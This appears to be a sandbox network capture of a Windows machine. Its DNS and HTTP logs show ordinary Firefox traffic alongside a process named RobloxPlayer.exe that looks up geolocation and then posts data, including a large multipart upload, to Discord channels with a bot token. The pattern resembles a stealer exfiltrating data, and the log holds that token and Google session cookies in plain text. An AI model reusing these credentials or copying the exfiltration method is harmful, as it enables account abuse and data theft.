IN A

44.237.65.238
DNS

contile.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

contile.services.mozilla.com

IN AAAA

Response
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
DNS

autopush.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

autopush.prod.mozaws.net

IN A

Response

autopush.prod.mozaws.net

IN A

34.107.243.93
DNS

autopush.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

autopush.prod.mozaws.net

IN AAAA

Response
DNS

firefox.settings.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox.settings.services.mozilla.com

IN A

Response

firefox.settings.services.mozilla.com

IN CNAME

prod.remote-settings.prod.webservices.mozgcp.net

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

global.px.quantserve.com

firefox.exe

Remote address:

8.8.8.8:53

Request

global.px.quantserve.com

IN AAAA

Response

global.px.quantserve.com

IN AAAA

2620:116:800d:21:7eb1:3826:be7e:d981

global.px.quantserve.com

IN AAAA

2620:116:800d:21:de2e:c7b3:55c0:d5a0

global.px.quantserve.com

IN AAAA

2620:116:800d:21:ef75:8280:f209:5ba1

global.px.quantserve.com

IN AAAA

2620:116:800d:21:b314:a0ef:ab7c:d546
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

238.65.237.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.65.237.44.in-addr.arpa

IN PTR

Response

238.65.237.44.in-addr.arpa

IN PTR

ec2-44-237-65-238 us-west-2compute amazonawscom
GET

https://push.services.mozilla.com/

firefox.exe

Remote address:

34.107.243.93:443

Request

GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: Vl3GD/2oF6fP0mTGIYpZYg==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

Response

HTTP/1.1 101 Switching Protocols

connection: upgrade
upgrade: websocket
sec-websocket-accept: g6UwKk+UdKSfn50BqIOmzxZTDGE=
date: Sun, 26 May 2024 02:05:12 GMT
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
if-modified-since: Fri, 25 Mar 2022 17:45:46 GMT
if-none-match: "1648230346554"
te: trailers

Response

HTTP/2.0 200

server: nginx
content-length: 232
access-control-allow-origin: *
access-control-expose-headers: Alert, Content-Type, Content-Length, Backoff, Retry-After
x-content-type-options: nosniff
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
via: 1.1 google
date: Sun, 26 May 2024 01:05:48 GMT
age: 3569
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json
GET

https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?collection=partitioning-exempt-urls&bucket=main&_expected=0

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/monitor/collections/changes/changeset?collection=partitioning-exempt-urls&bucket=main&_expected=0 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

server: nginx
content-length: 232
access-control-allow-origin: *
access-control-expose-headers: Alert, Content-Type, Content-Length, Backoff, Retry-After
x-content-type-options: nosniff
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
via: 1.1 google
date: Sun, 26 May 2024 01:05:48 GMT
age: 3569
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json
GET

https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/partitioning-exempt-urls/changeset?_expected=1702403047185

firefox.exe

Remote address:

34.149.100.209:443

Request

GET /v1/buckets/main/collections/partitioning-exempt-urls/changeset?_expected=1702403047185 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

server: nginx
content-length: 232
access-control-allow-origin: *
access-control-expose-headers: Alert, Content-Type, Content-Length, Backoff, Retry-After
x-content-type-options: nosniff
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
via: 1.1 google
date: Sun, 26 May 2024 01:05:48 GMT
age: 3569
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json
GET

https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expected=%221716677862123%22

firefox.exe

Remote address:

34.149.100.209:443

Response

HTTP/2.0 200

server: nginx
content-length: 232
access-control-allow-origin: *
access-control-expose-headers: Alert, Content-Type, Content-Length, Backoff, Retry-After
x-content-type-options: nosniff
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
via: 1.1 google
date: Sun, 26 May 2024 01:05:48 GMT
age: 3569
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json

Request

GET /v1/buckets/monitor/collections/changes/changeset?_expected=%221716677862123%22 HTTP/2.0
host: firefox.settings.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

firefox.exe

Remote address:

34.149.100.209:443

Response

HTTP/2.0 200

server: nginx
content-length: 232
access-control-allow-origin: *
access-control-expose-headers: Alert, Content-Type, Content-Length, Backoff, Retry-After
x-content-type-options: nosniff
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
via: 1.1 google
date: Sun, 26 May 2024 01:05:48 GMT
age: 3569
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json
DNS

firefox.exe

Remote address:

34.149.100.209:443

Response

HTTP/2.0 200

server: nginx
content-length: 232
access-control-allow-origin: *
access-control-expose-headers: Alert, Content-Type, Content-Length, Backoff, Retry-After
x-content-type-options: nosniff
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
via: 1.1 google
date: Sun, 26 May 2024 01:05:48 GMT
age: 3569
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json
DNS

firefox.exe

Remote address:

34.149.100.209:443

Response

HTTP/2.0 200

server: nginx
content-length: 2377
access-control-allow-origin: *
access-control-expose-headers: Backoff, Retry-After, Content-Length, Content-Type, Alert
x-content-type-options: nosniff
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
via: 1.1 google
date: Sun, 26 May 2024 01:45:54 GMT
age: 1164
last-modified: Tue, 21 May 2024 08:55:57 GMT
content-type: application/json
last-modified: Sat, 25 May 2024 22:57:42 GMT
content-type: application/json
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
GET

https://www.google.com/search?client=firefox-b-d&q=how+to+check+if+im+ratted

firefox.exe

Remote address:

142.250.187.196:443

Request

GET /search?client=firefox-b-d&q=how+to+check+if+im+ratted HTTP/2.0
host: www.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:81f::2004
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

196.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.187.250.142.in-addr.arpa

IN PTR

Response

196.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f41e100net
DNS

discord.com

RobloxPlayer.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.135.232
POST

https://discord.com/api/v9/guilds/1201970766531530822/channels

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/guilds/1201970766531530822/channels HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 29
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 201 Created

Date: Sun, 26 May 2024 02:05:19 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=670654f61b0411efba668acba8eaba2f; Expires=Fri, 25-May-2029 02:05:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
x-ratelimit-limit: 2000
x-ratelimit-remaining: 1987
x-ratelimit-reset: 1716772589.836
x-ratelimit-reset-after: 83470.487
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dwEDiY3we0vVaMsF8cUbQId7N9dbZY%2Fg%2BjEu7OOu83Vg0CTcRXIi4OHMhDiH6NtfErYdmu5M0Y%2FHlaCtCsqtKGYzrKPJiymaBcufZxSYDW9WvNkbuvscfM4cFyBv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=670654f61b0411efba668acba8eaba2fa9d01737a8472ed3806f6dd6e4c5383853d56e0a8472fb4ca22a3c5fda13c114; Expires=Fri, 25-May-2029 02:05:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=99e2ea1c2dcb16f9d4b21d81136e4f405a8d78ad-1716689119; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=ZjT4gsJSNcxdG3W.ef7nudWVSYD1BNsQtLlHfoHXMCE-1716689119452-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a33129a2c93db-LHR
DNS

195.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.212.58.216.in-addr.arpa

IN PTR

Response

195.212.58.216.in-addr.arpa

IN PTR

lhr25s27-in-f31e100net

195.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f3�H

195.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f195�H
DNS

99.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.201.58.216.in-addr.arpa

IN PTR

Response

99.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f991e100net

99.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f3�H

99.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f3�H
DNS

232.137.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.137.159.162.in-addr.arpa

IN PTR

Response
DNS

geolocation-db.com

RobloxPlayer.exe

Remote address:

8.8.8.8:53

Request

geolocation-db.com

IN A

Response

geolocation-db.com

IN A

159.89.102.253
GET

https://geolocation-db.com/json

RobloxPlayer.exe

Remote address:

159.89.102.253:443

Request

GET /json HTTP/1.1
Host: geolocation-db.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 26 May 2024 02:05:20 GMT
Content-Type: text/html
Content-Length: 194
Location: https://geolocation-db.com/json/
Connection: keep-alive
GET

https://geolocation-db.com/json/

RobloxPlayer.exe

Remote address:

159.89.102.253:443

Request

GET /json/ HTTP/1.1
Host: geolocation-db.com

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 26 May 2024 02:05:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 116
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:05:20 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=67d3873c1b0411ef8d79c672566fb0d5; Expires=Fri, 25-May-2029 02:05:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689121.671
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DyrPXOH5wEPJykMqtgqeP39lblX8NRFZXJqJEIhZlgJgYH%2FZBWylFIckdLmU9H9u%2FWlD2PFrCPZ%2FY2LjwD7wtY5WQYxgnxLWp6CJwUYPQ2jYcBBR5WW9KKriEiSq"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=67d3873c1b0411ef8d79c672566fb0d59caba80dfbb7a8eff62f1857939bf3ba07f34bd7a651fc0d7644f58e7c9329cd; Expires=Fri, 25-May-2029 02:05:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=b707731bb2e9fdc33044c19d5231e886a6e8cc7b-1716689120; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=ZPo9GnnvR7BtS.s4ViX1kp_uKvx67F0z36vS7xploo0-1716689120796-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a331b6bd563f8-LHR
DNS

253.102.89.159.in-addr.arpa

Remote address:

8.8.8.8:53

Request

253.102.89.159.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

0.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.159.190.20.in-addr.arpa

IN PTR

Response
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: multipart/form-data; boundary="71bf8077-e7b5-4a6f-aa87-6e2c6801d9b5"
Host: discord.com
Content-Length: 389488
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:05:34 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=6fb8f6b21b0411efa96e3ed32eb2c81a; Expires=Fri, 25-May-2029 02:05:33 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689134.579
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RQ3ZiHXCONbO51KVeIgraNcxx5e3foCOvXhcTHQ680w4tT15IRC59162wcV5NlpX%2ByiOaRDdzgRNFCju07jzwJETjdZoVmZ1vCYelM94nDBLd4S5ic2OppA2CgXn"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=6fb8f6b21b0411efa96e3ed32eb2c81aabd516cdf5014c2f844e38ac0ca57fff3d966a717c62bed7b720b5e5bd516cb3; Expires=Fri, 25-May-2029 02:05:33 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=7131c6146e55ae9a10c1fb4c858180526e9919b1-1716689134; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=UEgQ.1LHEke484pKgxCQa97pVhAZG0VXleqItksgwUU-1716689134044-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a336a2fc3947b-LHR
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:05:34 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=6fe2f4261b0411efb9483ad341a91b7d; Expires=Fri, 25-May-2029 02:05:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1716689135.580
x-ratelimit-reset-after: 1.344
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HOCyEwUkjIWjlU6%2BQtNZzLNtbgbpSW3scPQt9%2BMul%2BoPv9fm4XMZVX8eJd95yj3JftLEfAWvZkTn1QazfThO%2BGuPVLm4dpCziZBzI9Yz1PxvSFpG%2BPjZfPl54ob0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=6fe2f4261b0411efb9483ad341a91b7d481d2b74ce212eac0e27df1ea67d2c889c302f93e0b490c77e896315675fd1fd; Expires=Fri, 25-May-2029 02:05:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=7131c6146e55ae9a10c1fb4c858180526e9919b1-1716689134; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=4dbB1EG26NNytmKV4wH91hWB_q1L8g1iSQahDVespaE-1716689134320-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a33705dcf4182-LHR
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response
DNS

183.142.211.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.142.211.20.in-addr.arpa

IN PTR

Response
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

id.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

id.google.com

IN A

Response

id.google.com

IN A

216.58.204.67
GET

https://id.google.com/verify/AAtmn1ZqNKaR7uwgL2n-xm5soaXg5c0BOy-wlJoF_pLsxkqbaG4tIE97gSJgnMvJFILbMNBjPp5YE6OA__L8rRZ11LJJ_T7F2h8SWhHVoUsqPUAG0A

firefox.exe

Remote address:

216.58.204.67:443

Request

GET /verify/AAtmn1ZqNKaR7uwgL2n-xm5soaXg5c0BOy-wlJoF_pLsxkqbaG4tIE97gSJgnMvJFILbMNBjPp5YE6OA__L8rRZ11LJJ_T7F2h8SWhHVoUsqPUAG0A HTTP/2.0
host: id.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.google.com/
cookie: AEC=AQTF6HyU1fHvhRGeIT2VipvcMegxKrVpf7fkzojyOlEY776so_ubDT9f1A
cookie: NID=514=S_NDNFAjFwzC8XHgyl7SQlKgC7ysjtgn3-6enaA8sJuByW8BWt4WAcu-oxt-WXlrhParWa1TyWBAokeds1eekyMphiyZVghcEontAjOx91_XsJZrd3VVetMOLLWpffcMA9V7FusyBGAel0EcGZFaeBAoCkMKv2EDbIpfkkSLOgc
cookie: GOOGLE_ABUSE_EXEMPTION=ID=c9246df5499ca5f4:TM=1716689115:C=r:IP=191.101.209.39-:S=wUY4Ng_OgEYEf2kU6iX_iIk
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-site
te: trailers
DNS

id.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

id.google.com

IN A

Response

id.google.com

IN A

142.250.200.3
DNS

id.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

id.google.com

IN AAAA

Response

id.google.com

IN AAAA

2a00:1450:4009:81e::2003
DNS

67.204.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.204.58.216.in-addr.arpa

IN PTR

Response

67.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f671e100net

67.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f3�H

67.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f3�H
DNS

i.ytimg.com

firefox.exe

Remote address:

8.8.8.8:53

Request

i.ytimg.com

IN A

Response

i.ytimg.com

IN A

216.58.212.246

i.ytimg.com

IN A

172.217.169.54

i.ytimg.com

IN A

142.250.179.246

i.ytimg.com

IN A

142.250.180.22

i.ytimg.com

IN A

142.250.187.214

i.ytimg.com

IN A

142.250.187.246

i.ytimg.com

IN A

142.250.178.22

i.ytimg.com

IN A

172.217.16.246

i.ytimg.com

IN A

142.250.200.22

i.ytimg.com

IN A

142.250.200.54

i.ytimg.com

IN A

216.58.201.118

i.ytimg.com

IN A

216.58.204.86
DNS

i.ytimg.com

firefox.exe

Remote address:

8.8.8.8:53

Request

i.ytimg.com

IN A

Response

i.ytimg.com

IN A

216.58.212.246

i.ytimg.com

IN A

172.217.169.54

i.ytimg.com

IN A

142.250.179.246

i.ytimg.com

IN A

142.250.180.22

i.ytimg.com

IN A

142.250.187.214

i.ytimg.com

IN A

142.250.187.246

i.ytimg.com

IN A

142.250.178.22

i.ytimg.com

IN A

172.217.16.246

i.ytimg.com

IN A

142.250.200.22

i.ytimg.com

IN A

142.250.200.54

i.ytimg.com

IN A

216.58.201.118

i.ytimg.com

IN A

216.58.204.86
GET

https://i.ytimg.com/vi/aFh40zRXEaU/mqdefault.jpg?sqp=-oaymwEFCJQBEFM&rs=AMzJL3mTw7O_v4PkwZiLn9Q2s7FzLuGQBQ

firefox.exe

Remote address:

216.58.212.246:443

Request

GET /vi/aFh40zRXEaU/mqdefault.jpg?sqp=-oaymwEFCJQBEFM&rs=AMzJL3mTw7O_v4PkwZiLn9Q2s7FzLuGQBQ HTTP/2.0
host: i.ytimg.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

i.ytimg.com

firefox.exe

Remote address:

8.8.8.8:53

Request

i.ytimg.com

IN AAAA

Response

i.ytimg.com

IN AAAA

2a00:1450:4009:80b::2016

i.ytimg.com

IN AAAA

2a00:1450:4009:818::2016

i.ytimg.com

IN AAAA

2a00:1450:4009:81d::2016

i.ytimg.com

IN AAAA

2a00:1450:4009:81e::2016
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.238
POST

https://play.google.com/log?format=json&hasfast=true

firefox.exe

Remote address:

142.250.179.238:443

Request

POST /log?format=json&hasfast=true HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.google.com/
content-type: application/x-www-form-urlencoded;charset=utf-8
content-length: 785
origin: https://www.google.com
cookie: AEC=AQTF6HyU1fHvhRGeIT2VipvcMegxKrVpf7fkzojyOlEY776so_ubDT9f1A
cookie: NID=514=lKnPDPHsgh774lks1VFyB28Oxsgzp0Mvmh51VVQ1FA5KqvmzCvtr0KlQIRuw_rwZLXgvzTFNLFeg3exVm8GIndQ7whTHr4G6g2HaeC7JdlCOeZmKgq9gznIFJadG17yFxsJnWE4VKThF8v-9yfXFWDKlRSzA_tGpeeGfTuotSdMowdKkphifB5otMg
cookie: GOOGLE_ABUSE_EXEMPTION=ID=c9246df5499ca5f4:TM=1716689115:C=r:IP=191.101.209.39-:S=wUY4Ng_OgEYEf2kU6iX_iIk
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.238
DNS

play.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN AAAA

Response

play.google.com
